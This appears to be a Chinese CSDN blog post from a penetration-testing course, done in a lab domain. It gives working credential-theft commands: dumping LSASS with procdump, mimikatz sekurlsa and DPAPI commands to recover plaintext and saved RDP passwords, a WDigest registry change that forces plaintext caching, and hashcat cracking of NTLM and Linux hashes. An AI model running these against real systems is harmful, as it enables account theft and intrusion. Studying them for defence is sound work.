第138天:内网安全-Win&Linux&内存离线读取&Hashcat 破解&RDP&SSH 存储提取

最新推荐文章于 2024-09-27 17:41:32 发布
最新推荐文章于 2024-09-27 17:41:32 发布
阅读量965 收藏 12
点赞数 9
文章标签: 安全 ssh 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/141687052
版权

案例一: 明文获取-Windows-内存读取&离线读取&RDP保存&Hashcat

windows实验背景

微软为了防止明文密码泄露发布了补丁 KB2871997 ,关闭了 Wdigest 功能。当系统为 win10 2012R2 以上时,默认在内存缓存中禁止保存明文密码, 此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

实验环境  god.org

离线读取

mimikatz被拦截(木马程序)

首先先上线win2012运行获取明文密码

获取明文密码都为空,只能获取hash

利用微软官方工具,在本地离线破解密码

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

https://github.com/gentilkiwi/mimikatz

首先上传procdump程序,或者在本地设置代理运行

这个程序是微软工具,不会被杀,运行下面的命令,然后将生成的文件保存在本地

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

本地解密文件

mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full

不一定能读出来,如果没有利用密码登录过或者没有开启存储

这里如果存储了并且登录过就能获取到明文的账号密码

不存储+禁用mimikatz

win2012以上的主机可能不会存储

通过修改注册表+强制锁屏,等待用户输入账号密码来存储

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

执行命令之前的注册表

执行命令

执行完成以后

锁屏重新登录以后,利用mimikatz抓取密码就可以直接抓取到明文密码了

在此基础上如果mimikatz也被禁用了那么用刚才的方法就可以在本地导出来密码

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

hash破解

虽然不能获得明文密码但是可以获得hash,可以直接利用网站进行破解

破解网站

MD5免费在线解密破解_MD5在线加密-SOMD5

md5解密 MD5在线解密 破解md5

RDP凭据抓取

当使用mstsc连接目标主机时往往为了方便会设置记住凭据按钮

利用win2012登录一次域控

查看连接记录的命令,这里在cs中运行时一定是你用哪个用户连接过,就用哪个用户测试

cmdkey /list

查看本地的Credentials

dir /a %userprofile%\appdata\local\microsoft\credentials\*

Credentials记录guidMasterKey值:

mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\99149C3884E841134091082C3D675F52

这里值要对应上

记录MasterKey

把guidmasterkey对应的masterkey记录下来

3963b39b-eaf5-4817-ad25-a5b65367190c

运行这条命令的时候需要管理员身份

mimikatz sekurlsa::dpapi

找的时候可以复制到记事本,ctrl+f搜索

解密masterkey凭据

mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\Credentials值 /masterkey:masterkey值
mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\99149C3884E841134091082C3D675F52 /masterkey:158efdc88d084af08d307b4071899fd4bfa5f47813ed7885043554c2374d7f5e7b8acfbbb1ad20d8463d32dfa65b48f6979c36d44c3860b39b8501e023c34ce1

 

hashcat破解

工具下载地址: https://hashcat.net/hashcat/

参考文章: https://www.cnblogs.com/Junglezt/p/16044372.html

windows

hashcat.exe -a 0 -m 1000 hash.txt pass.txt  #-a 后面是爆破方式0代表字典爆破 -m后面是爆破数据的类型1000代表NTLM

爆破结果

使用掩码爆破方式,我的密码是admin!@#45

hashcat.exe -a 3 -m 1000 hash.txt ?l?l?l?l?l?s?s?s?d?d  #代表五个小写字母,三个字符,两个数字

 这里本来就是一个很吃设备的应用,我就不运行了,运行了一会声音很大^_^

linux

hashcat也可以破解linux密码

先查看密码

linux sha512crypt $6$, SHA512 (Unix)加密方式:
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$, SHA256 (Unix)加密方式:
hashcat -m 7400 sha256linux.txt p.txt
linux下md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式:
hashcat -m 500 linuxmd5.txt p.txt
inux下bcrypt $2*$, Blowfish加密方式:
hashcat -m 3200 linuxmd5.txt p.txt

破解

破解结果

 

xiaojiesec
关注
内网安全——ssH协议&Windows&Linux密码获取hashcat
m0_61506558的博客
02-20 2239
我们配置服务器时打开关联密钥时,此次漏洞就可能存在。Hashcat号称宇宙最强密码破解工具,其是一款开源软件,有针对Windows、Mac和Linux的版本,支持CPU、GPU、APU、DSP和FPGA等多种计算核心,支持多种hash散列算法,
Linux-RDP:rdp 暴力破解,端口扫描器。 非常快的扫描仪
06-22
Linux-RDP Linux RDP 扫描器和 Bruteforcer 脚本。 升级扫描仪和暴力破解。 提高了端口扫描器的速度。 1kk ip 扫描 4 分钟。
sh文件加密解密gzexe(Cannot decompress $0)
我就叫贝塔
09-19 2994
sh文件加密解密gzexe(Cannot decompress $0)
破解Linux环境下Shell脚本加密的几种思路
xqhrs232的专栏
10-28 1万+
原文地址::https://qblog.org/manual/linux-shell-decode.html 前一阵发布关于一键云免的文章《网易蜂巢CentOS6.7搭建OpenVPN云免服务器及手机端使用教程》,里面的一键安装包源码是经过解密后得来的,有不少博友联系我告知解密的方法,其实,博主解密都是4-5月份的代码,6月份后的骚逼汪的安装代码都是转换成二进制可执行的linux
Linux如何写简单shell脚本、用户提权、暴力破解密码?
年轻秃了头的博客
12-07 1643
一、shell脚本 脚本的特点是后缀是.sh for循环格式: for i(变量名) in 范围 do 循环体 (命令)$! 【echo user$! | passwd --stdin user$!】 //后面可以加&>>/dev/null 【echo “user$!创建成功 ,密码是user$!”】——这个位置只能用双引号 Done 引用值是$! 脚本只支持非交互式命令 &>>/dev/nnull 打印出的内容扔到回收站 打开脚本的命令用bash 二、 用
138-横向移动 Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
DamnVanish的博客
08-24 996
Windows&Linux读取密码的多种姿势
内网安全Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
今天是几号的博客
04-08 1815
微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。2008 R2版本可以抓取明文密码2012 R2 Datacenter 版本抓不到密钥mimikatz被拦截(杀毒等):进行离线读取操作系统过高 => 2012:离线读取、修改注册表、对hash值进行破解利用RDP凭据mimipenguin 读取
内网横向移动—Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
剁椒鱼头没剁椒的博客
08-09 1025
关于SSH的密钥问题,本来想着先把关于SSH密钥的破解以及横向移动方式总结出来的,但是网上关于Linux系统横向移动手法,以及利用都太少了,目前也没看到很好的文章,很多问题确实把相关知识点总结了,但是感觉还是有点乱,所以就先把Linux横向移动方式先暂停,暂时不去总结Linux方面的横向移动。不过关于Linux方面的横向移动还是可以带一下的,因为从系统角度来说,Linux中横向移动的可利用方式确实少,正常情况下Linux系统利用多数都是利用Linux系统中安装的中间件软件等来实现横向移动。
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
m0_62207170的博客
05-12 1623
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
WEB安全-内网渗透
m0_73767545的博客
03-10 620
利用命令判断主机是否在域内。利用工具进行内网信息收集。
[原创]Ladon7.5大型内网渗透扫描器&Cobalt Strike
K8哥哥
11-10 1万+
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据
《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略
热门推荐
午夜安全
05-24 3万+
1.简介 Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这款工具被红队广泛使用,它简直是内网横向移动的大杀器。 2.主要功能 (1)信息搜集: 存活探测(icmp) 端口扫描 (2)爆破功能: 各类服务爆破(ssh、smb、rdp等)...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 815
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储
Splashtop 加入 Microsoft 智能安全协会
最新发布
SplashtopLoki的博客
09-27 791
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1180
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今学习如何通过C11智能指针构造伪。
注册安全分析报告:人民卫生音像
Explinks的博客
09-25 718
人民卫生音像出版社,作为国家卫生健康委员会、中宣部、财政部、教育部等国家部委的领导下的官方企业, 采用的是通俗的滑动验证产品, 该产品稳定并且市场占有率很高, 在一定程度上提高了用户体验, 但安全性在机器学习的今, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
Cain&Abel详细教程:内网分析与安全漏洞
"cain_使用详细教程 是一个关于网络安全工具Cain&Abel的教程,专注于内网分析。这个工具主要用于口令恢复、网络嗅探、网络欺骗、解码口令以及分析路由协议等。Cain是主要的组件,而Abel通常是后台服务。教程涵盖了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值